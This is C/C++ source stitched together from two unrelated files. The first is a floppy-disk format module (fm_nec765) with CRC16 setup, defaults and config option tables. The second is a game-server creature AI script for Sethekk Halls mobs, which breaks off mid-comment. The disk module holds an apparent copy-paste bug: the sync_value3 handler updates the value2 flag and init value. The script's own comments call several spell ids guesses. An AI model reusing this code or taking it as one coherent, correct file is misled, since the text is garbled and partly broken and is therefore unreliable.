* fm_nec765_set_crc16_init_value
****************************************************************************/
/****************************************************************************
 * fm_nec765_set_crc16_init_value
 ****************************************************************************/

/*
 * derive a crc16 init value from a 15-bit sync word, unless the value was
 * already set explicitly in the configuration (flag bit in mask). the data
 * bits of the sync word sit in every other bit position, so they are
 * extracted into one byte and run through the crc once.
 *
 * fix: the debug message previously always claimed "crc16_init_value1",
 * even when value2 or value3 was being calculated.
 */
static int
fm_nec765_set_crc16_init_value(
	struct fm_nec765		*fm_nec,
	int				mask,
	int				sync_value,
	unsigned short			*init_value)

	{
	unsigned char			data;
	int				i;

	/* value explicitly configured: keep it */
	if (fm_nec->rw.flags & mask) return (1);

	/* collect the data bits (every second bit, starting at 0x4000) */
	for (data = 0, i = 0x4000; i > 0; i >>= 2) data = (data << 1) | ((sync_value & i) ? 1 : 0);
	*init_value = fm_crc16(0xffff, &data, 1);
	debug_message(GENERIC, 2, "calculated crc16 init value = 0x%04x", *init_value);
	return (1);
	}
/****************************************************************************
* fm_nec765_set_defaults
****************************************************************************/
/* install the built-in default parameters for this format and derive the
   three crc16 init values from the sync words (unless overridden later
   via config flags); also initialize the per-sector shift table to 0
   (128-byte sectors) */
static void
fm_nec765_set_defaults(
union format *fmt)
{
const static struct fm_nec765 fm_nec =
{
.rd =
{
.flags = 0
},
.wr =
{
.prolog_length = 40,
.epilog_length = 274,
.prolog_value = 0x4e,
.epilog_value = 0x4e,
.fill_length1 = 6,
.fill_value1 = 0x00,
.fill_length2 = 26,
.fill_value2 = 0x4e,
.fill_length3 = 6,
.fill_value3 = 0x00,
.fill_length4 = 11,
.fill_value4 = 0x4e,
.fill_length5 = 6,
.fill_value5 = 0x00,
.fill_length6 = 27,
.fill_value6 = 0x4e,
.fill_length7 = 6,
.fill_value7 = 0x00,
.precomp = { }
},
.rw =
{
.sectors = 16,
.sync_value1 = 0xf57e, /* id address mark */
.sync_value2 = 0xf56f, /* data address mark */
.sync_value3 = 0xf56a, /* deleted data address mark */
.crc16_init_value1 = 0, /* derived below from the sync words */
.crc16_init_value2 = 0,
.crc16_init_value3 = 0,
.flags = 0,
.bnd =
{
BOUNDS_NEW(0x0800, 0x1a52, 0x2a00, 0),
BOUNDS_NEW(0x2b00, 0x36a5, 0x4800, 1)
}
}
};
debug_message(GENERIC, 2, "setting defaults");
fmt->fm_nec = fm_nec;
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1);
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2);
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE3_SET,
fmt->fm_nec.rw.sync_value3,
&fmt->fm_nec.rw.crc16_init_value3);
fm_fill_sector_shift(fmt->fm_nec.rw.pshift, 0, GLOBAL_NR_SECTORS, 0);
}
/****************************************************************************
* fm_nec765_set_read_option
****************************************************************************/
/* dispatch a read option from the config parser onto the matching flag
   bit in rd.flags; unknown magic values trip the debug assertion */
static int
fm_nec765_set_read_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting read option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_IGNORE_SECTOR_SIZE) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_SECTOR_SIZE));
if (magic == MAGIC_IGNORE_CHECKSUMS) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_CHECKSUMS));
if (magic == MAGIC_IGNORE_TRACK_MISMATCH) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_TRACK_MISMATCH));
if (magic == MAGIC_MATCH_SIMPLE) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_MATCH_SIMPLE));
if (magic == MAGIC_MATCH_SIMPLE_FIXUP) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_MATCH_SIMPLE_FIXUP));
debug_error_condition(magic != MAGIC_POSTCOMP_SIMPLE);
return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_POSTCOMP_SIMPLE));
}
/****************************************************************************
* fm_nec765_set_write_option
****************************************************************************/
static int
fm_nec765_set_write_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting write option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_PROLOG_LENGTH) return (setvalue_ushort(&fmt->fm_nec.wr.prolog_length, val, 1, 0xffff));
if (magic == MAGIC_PROLOG_VALUE) return (setvalue_uchar(&fmt->fm_nec.wr.prolog_value, val, 0, 0xff));
if (magic == MAGIC_EPILOG_LENGTH) return (setvalue_ushort(&fmt->fm_nec.wr.epilog_length, val, 1, 0xffff));
if (magic == MAGIC_EPILOG_VALUE) return (setvalue_uchar(&fmt->fm_nec.wr.epilog_value, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH1) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length1, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE1) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value1, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH2) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length2, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE2) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value2, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH3) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length3, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE3) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value3, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH4) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length4, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE4) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value4, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH5) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length5, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE5) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value5, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH6) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length6, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE6) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value6, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH7) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length7, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE7) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value7, val, 0, 0xff));
debug_error_condition(magic != MAGIC_PRECOMP);
return (setvalue_short(&fmt->fm_nec.wr.precomp[ofs], val, -0x4000, 0x4000));
}
/****************************************************************************
* fm_nec765_set_rw_option
****************************************************************************/
static int
fm_nec765_set_rw_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting rw option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_SECTORS)
{
fm_fill_sector_shift(fmt->fm_nec.rw.pshift, fmt->fm_nec.rw.sectors, GLOBAL_NR_SECTORS, 0);
return (setvalue_uchar(&fmt->fm_nec.rw.sectors, val, 1, GLOBAL_NR_SECTORS));
}
if (magic == MAGIC_SYNC_VALUE1)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value1, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1));
}
if (magic == MAGIC_SYNC_VALUE2)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value2, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
}
if (magic == MAGIC_SYNC_VALUE3)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value3, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
}
if (magic == MAGIC_CRC16_INIT_VALUE1)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE1_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value1, val, 0, 0xffff));
}
if (magic == MAGIC_CRC16_INIT_VALUE2)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE2_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value2, val, 0, 0xffff));
}
if (magic == MAGIC_CRC16_INIT_VALUE3)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE3_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE3_SET,
fmt->fm_nec.rw.sync_value3,
&fmt->fm_nec.rw.crc16_init_value3));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value3, val, 0, 0xffff));
}
if (magic == MAGIC_SECTOR_SIZES) return (fm_set_sector_size(fmt->fm_nec.rw.pshift, ofs, GLOBAL_NR_SECTORS, val));
if (magic == MAGIC_BOUNDS_OLD) return (setvalue_bounds_old(fmt->fm_nec.rw.bnd, val, ofs));
debug_error_condition(magic != MAGIC_BOUNDS_NEW);
return (setvalue_bounds_new(fmt->fm_nec.rw.bnd, val, ofs));
}
/****************************************************************************
* fm_nec765_get_sector_size
****************************************************************************/
/*
 * Size in bytes of one sector (<sector> >= 0), or the sum of all
 * configured sector sizes on the track when <sector> is negative.
 * Asserts (debug builds) that <sector> is below the sector count.
 */
static int
fm_nec765_get_sector_size(
	union format *fmt,
	int sector)
{
	int idx, total;

	debug_error_condition(sector >= fmt->fm_nec.rw.sectors);
	if (sector >= 0) return (fm_nec765_sector_size(&fmt->fm_nec, sector));
	total = 0;
	for (idx = 0; idx < fmt->fm_nec.rw.sectors; idx++)
	{
		total += fm_nec765_sector_size(&fmt->fm_nec, idx);
	}
	return (total);
}
/****************************************************************************
* fm_nec765_get_sectors
****************************************************************************/
/* Number of sectors currently configured for this format. */
static int
fm_nec765_get_sectors(
	union format *fmt)
{
	return fmt->fm_nec.rw.sectors;
}
/****************************************************************************
* fm_nec765_get_flags
****************************************************************************/
/*
 * Format capability flags: FORMAT_FLAG_OUTPUT while output mode is
 * selected via the global options, FORMAT_FLAG_NONE otherwise.
 */
static int
fm_nec765_get_flags(
	union format *fmt)
{
	return (options_get_output() ? FORMAT_FLAG_OUTPUT : FORMAT_FLAG_NONE);
}
/****************************************************************************
* fm_nec765_get_data_offset
****************************************************************************/
/* This format exposes no fixed data offset; always reports -1. */
static int
fm_nec765_get_data_offset(
	union format *fmt)
{
	return -1;
}
/****************************************************************************
* fm_nec765_get_data_size
****************************************************************************/
/* This format exposes no fixed data size; always reports -1. */
static int
fm_nec765_get_data_size(
	union format *fmt)
{
	return -1;
}
/****************************************************************************
* fm_nec765_read_options
****************************************************************************/
/*
 * Config-file options accepted in the read section; each entry maps an
 * option name to the MAGIC_* dispatched by fm_nec765_set_read_option()
 * plus its parameter count.  "postcomp" is kept as a compat alias for
 * "postcomp_simple".  Entry order is preserved deliberately.
 */
static struct format_option fm_nec765_read_options[] =
{
	FORMAT_OPTION_BOOLEAN("ignore_sector_size", MAGIC_IGNORE_SECTOR_SIZE, 1),
	FORMAT_OPTION_BOOLEAN("ignore_checksums", MAGIC_IGNORE_CHECKSUMS, 1),
	FORMAT_OPTION_BOOLEAN("ignore_track_mismatch", MAGIC_IGNORE_TRACK_MISMATCH, 1),
	FORMAT_OPTION_BOOLEAN("match_simple", MAGIC_MATCH_SIMPLE, 1),
	FORMAT_OPTION_BOOLEAN("match_simple_fixup", MAGIC_MATCH_SIMPLE_FIXUP, 1),
	FORMAT_OPTION_BOOLEAN_COMPAT("postcomp", MAGIC_POSTCOMP_SIMPLE, 1),
	FORMAT_OPTION_BOOLEAN("postcomp_simple", MAGIC_POSTCOMP_SIMPLE, 1),
	FORMAT_OPTION_END
};
/****************************************************************************
* fm_nec765_write_options
****************************************************************************/
/*
 * Config-file options accepted in the write section, dispatched through
 * fm_nec765_set_write_option().  "precomp" takes 4 values (one per
 * precompensation table slot).
 */
static struct format_option fm_nec765_write_options[] =
{
	FORMAT_OPTION_INTEGER("prolog_length", MAGIC_PROLOG_LENGTH, 1),
	FORMAT_OPTION_INTEGER("prolog_value", MAGIC_PROLOG_VALUE, 1),
	FORMAT_OPTION_INTEGER("epilog_length", MAGIC_EPILOG_LENGTH, 1),
	FORMAT_OPTION_INTEGER("epilog_value", MAGIC_EPILOG_VALUE, 1),
	FORMAT_OPTION_INTEGER("fill_length1", MAGIC_FILL_LENGTH1, 1),
	FORMAT_OPTION_INTEGER("fill_value1", MAGIC_FILL_VALUE1, 1),
	FORMAT_OPTION_INTEGER("fill_length2", MAGIC_FILL_LENGTH2, 1),
	FORMAT_OPTION_INTEGER("fill_value2", MAGIC_FILL_VALUE2, 1),
	FORMAT_OPTION_INTEGER("fill_length3", MAGIC_FILL_LENGTH3, 1),
	FORMAT_OPTION_INTEGER("fill_value3", MAGIC_FILL_VALUE3, 1),
	FORMAT_OPTION_INTEGER("fill_length4", MAGIC_FILL_LENGTH4, 1),
	FORMAT_OPTION_INTEGER("fill_value4", MAGIC_FILL_VALUE4, 1),
	FORMAT_OPTION_INTEGER("fill_length5", MAGIC_FILL_LENGTH5, 1),
	FORMAT_OPTION_INTEGER("fill_value5", MAGIC_FILL_VALUE5, 1),
	FORMAT_OPTION_INTEGER("fill_length6", MAGIC_FILL_LENGTH6, 1),
	FORMAT_OPTION_INTEGER("fill_value6", MAGIC_FILL_VALUE6, 1),
	FORMAT_OPTION_INTEGER("fill_length7", MAGIC_FILL_LENGTH7, 1),
	FORMAT_OPTION_INTEGER("fill_value7", MAGIC_FILL_VALUE7, 1),
	FORMAT_OPTION_INTEGER("precomp", MAGIC_PRECOMP, 4),
	FORMAT_OPTION_END
};
/****************************************************************************
* fm_nec765_rw_options
****************************************************************************/
/*
 * Config-file options shared by read and write, dispatched through
 * fm_nec765_set_rw_option().  "sector_sizes" takes a variable number of
 * values (-1); "bounds" is a compat alias for "bounds_old" (6 values).
 */
static struct format_option fm_nec765_rw_options[] =
{
	FORMAT_OPTION_INTEGER("sectors", MAGIC_SECTORS, 1),
	FORMAT_OPTION_INTEGER("sync_value1", MAGIC_SYNC_VALUE1, 1),
	FORMAT_OPTION_INTEGER("sync_value2", MAGIC_SYNC_VALUE2, 1),
	FORMAT_OPTION_INTEGER("sync_value3", MAGIC_SYNC_VALUE3, 1),
	FORMAT_OPTION_INTEGER("crc16_init_value1", MAGIC_CRC16_INIT_VALUE1, 1),
	FORMAT_OPTION_INTEGER("crc16_init_value2", MAGIC_CRC16_INIT_VALUE2, 1),
	FORMAT_OPTION_INTEGER("crc16_init_value3", MAGIC_CRC16_INIT_VALUE3, 1),
	FORMAT_OPTION_INTEGER("sector_sizes", MAGIC_SECTOR_SIZES, -1),
	FORMAT_OPTION_INTEGER_COMPAT("bounds", MAGIC_BOUNDS_OLD, 6),
	FORMAT_OPTION_INTEGER("bounds_old", MAGIC_BOUNDS_OLD, 6),
	FORMAT_OPTION_INTEGER("bounds_new", MAGIC_BOUNDS_NEW, 6),
	FORMAT_OPTION_END
};
/****************************************************************************
*
* global functions
*
****************************************************************************/
/****************************************************************************
* fm_nec765_format_desc
****************************************************************************/
/*
 * Public descriptor wiring the fm_nec765 format into the generic format
 * framework: name, level, and the set/get/track callbacks plus the
 * three option tables defined above.
 */
struct format_desc fm_nec765_format_desc =
{
	.name             = "fm_nec765",
	.level            = 3,
	.set_defaults     = fm_nec765_set_defaults,
	.set_read_option  = fm_nec765_set_read_option,
	.set_write_option = fm_nec765_set_write_option,
	.set_rw_option    = fm_nec765_set_rw_option,
	.get_sectors      = fm_nec765_get_sectors,
	.get_sector_size  = fm_nec765_get_sector_size,
	.get_flags        = fm_nec765_get_flags,
	.get_data_offset  = fm_nec765_get_data_offset,
	.get_data_size    = fm_nec765_get_data_size,
	.track_statistics = fm_nec765_statistics,   /* defined elsewhere in this file */
	.track_read       = fm_nec765_read_track,   /* defined elsewhere in this file */
	.track_write      = fm_nec765_write_track,  /* defined elsewhere in this file */
	.fmt_opt_rd       = fm_nec765_read_options,
	.fmt_opt_wr       = fm_nec765_write_options,
	.fmt_opt_rw       = fm_nec765_rw_options
};
/******************************************************** Karsten Scheibler */
#include "StdAfx.h"
#include "Setup.h"
/************************************************************************/
/* Instance_SethekkHalls.cpp Script */
/************************************************************************/
// Avian Darkhawk AI
#define CN_AVIAN_DARKHAWK 20686
#define CHARGE 36509 // no idea if this is correct id
// Avian Darkhawk trash AI: plain melee plus an occasional Charge on the
// current victim (spell id is a guess, per the define above).  The spell
// roll works in two AIUpdate ticks: first the spell is "armed" (attack
// timer paused via setAttackTimer), then it is cast on the next tick.
// FIX: removed the unused protected member `Unit *target;` -- SpellCast
// always declared its own local of the same name, so the member was
// dead weight that only shadowed state.
class AVIANDARKHAWKAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(AVIANDARKHAWKAI);
	SP_AI_Spell spells[1];   // scripted spell table
	bool m_spellcheck[1];    // per-spell "armed, cast next tick" flag

	AVIANDARKHAWKAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 1;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(CHARGE);
		spells[0].targettype = TARGET_ATTACKING;
		spells[0].instant = true;
		spells[0].perctrigger = 5.0f;   // 5% chance per AI update
		spells[0].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose probability
	// bracket contains val.  Only runs while idle and with a target.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Avian Ripper AI
#define CN_AVIAN_RIPPER 21891
#define FLESH_RIP 40199
class AVIANRIPPERAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(AVIANRIPPERAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
AVIANRIPPERAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FLESH_RIP);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 15.0f;
spells[0].attackstoptimer = 3000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Avian Warhawk AI
#define CN_AVIAN_WARHAWK 21904 // test it more@
#define CLEAVE 38474 // no idea if this is right
#define CHARGE_WARHAWK 40602 // same here
#define CARNIVOROUS_BITE 39382 // and here =)
// Avian Warhawk trash AI: Cleave (self-centered AoE cast), Charge, and
// Carnivorous Bite, each rolled independently per AI update (spell ids
// are guesses, per the defines above).  Spells are armed on one tick
// and cast on the next.
// FIX: removed the unused protected member `Unit *target;` -- SpellCast
// always declared its own local of the same name, so the member was
// never read or written.
class AVIANWARHAWKAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(AVIANWARHAWKAI);
	SP_AI_Spell spells[3];   // scripted spell table
	bool m_spellcheck[3];    // per-spell "armed, cast next tick" flag

	AVIANWARHAWKAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 3;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(CLEAVE);
		spells[0].targettype = TARGET_VARIOUS;
		spells[0].instant = true;
		spells[0].perctrigger = 12.0f;
		spells[0].attackstoptimer = 1000;

		spells[1].info = sSpellStore.LookupEntry(CHARGE_WARHAWK);
		spells[1].targettype = TARGET_ATTACKING;
		spells[1].instant = true;
		spells[1].perctrigger = 5.0f;
		spells[1].attackstoptimer = 1000;

		spells[2].info = sSpellStore.LookupEntry(CARNIVOROUS_BITE);
		spells[2].targettype = TARGET_ATTACKING; // check targeting!
		spells[2].instant = true;
		spells[2].perctrigger = 12.0f;
		spells[2].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose probability
	// bracket contains val.  Only runs while idle and with a target.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Cobalt Serpent AI
#define CN_COBALT_SERPENT 19428
#define WING_BUFFET 41572
#define FROSTBOLT 40429 // no idea about if these are good ids :P
#define CHAIN_LIGHTNING_SERPENT 39945
// Cobalt Serpent trash AI: Wing Buffet (AoE), Frostbolt and Chain
// Lightning, each rolled independently per AI update (spell ids are
// guesses, per the defines above).  A spell is "armed" on one tick
// (attack timer paused) and actually cast on the next tick.
class COBALTSERPENTAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(COBALTSERPENTAI);
	SP_AI_Spell spells[3];   // scripted spell table
	bool m_spellcheck[3];    // per-spell "armed, cast next tick" flag

	COBALTSERPENTAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 3;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(WING_BUFFET);
		spells[0].targettype = TARGET_VARIOUS;
		spells[0].instant = false;
		spells[0].perctrigger = 7.0f;
		spells[0].attackstoptimer = 1000;

		spells[1].info = sSpellStore.LookupEntry(FROSTBOLT);
		spells[1].targettype = TARGET_ATTACKING;
		spells[1].instant = false;
		spells[1].perctrigger = 15.0f;
		spells[1].attackstoptimer = 1000;

		spells[2].info = sSpellStore.LookupEntry(CHAIN_LIGHTNING_SERPENT);
		spells[2].targettype = TARGET_ATTACKING;
		spells[2].instant = false;
		spells[2].perctrigger = 9.0f;
		spells[2].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Time-Lost Controller AI
#define CN_TIME_LOST_CONTROLLER 20691
#define SHIRNK 36697 // 36697 or 35013
//#define CONTROL_TOTEM // Can't find spell for that :O
// Time-Lost Controller trash AI: occasionally Shrinks its current
// victim (spell id uncertain, per the define above).  The control-totem
// ability is left unimplemented because no spell id was found.  A spell
